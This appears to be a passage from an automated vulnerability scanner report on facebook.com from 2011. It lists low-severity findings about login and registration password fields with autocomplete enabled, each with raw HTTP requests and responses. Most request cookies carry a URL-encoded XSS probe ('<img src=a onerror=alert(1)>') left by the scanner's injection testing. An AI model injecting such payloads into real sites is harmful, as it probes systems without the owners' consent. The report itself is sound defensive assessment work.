Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.154.29
Connection: close
Date: Thu, 05 May 2011 11:42:29 GMT
Content-Length: 47590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.69. http://www.facebook.com/share.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1&display=popup
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.25.111
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1&amp;display=popup" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

12.70. http://www.facebook.com/sharer.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1&display=popup
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.32.111
Connection: close
Date: Thu, 05 May 2011 10:56:48 GMT
Content-Length: 10419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1&amp;display=popup" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

12.71. http://www.facebook.com/skdarealist

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /skdarealist

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /skdarealist HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.81
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 115848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.72. http://www.facebook.com/sportingnews

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sportingnews

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /sportingnews HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.141.21
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 197753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.73. http://www.facebook.com/stefanoboscolomarchi

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /stefanoboscolomarchi

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /stefanoboscolomarchi HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.47
Connection: close
Date: Thu, 05 May 2011 11:42:33 GMT
Content-Length: 145632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.74. http://www.facebook.com/techcrunch

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /techcrunch

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /techcrunch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.25
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 39532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.75. http://www.facebook.com/terms.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /terms.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /terms.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.4.129
Connection: close
Date: Thu, 05 May 2011 10:56:50 GMT
Content-Length: 44062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.76. http://www.facebook.com/theteebers

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /theteebers

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /theteebers HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.23
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 67960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.77. http://www.facebook.com/wmoppert

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /wmoppert

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /wmoppert HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.45
Connection: close
Date: Thu, 05 May 2011 11:42:10 GMT
Content-Length: 39263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.78. https://www.facebook.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/
The form contains the following password field with autocomplete enabled:
  • reg_passwd__

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.195.126
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 30968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

12.79. https://www.facebook.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.195.126
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 30968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.80. https://www.facebook.com/ajax/intl/language_dialog.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.20.120
Connection: close
Date: Thu, 05 May 2011 10:56:54 GMT
Content-Length: 40729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.81. https://www.facebook.com/h02332

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
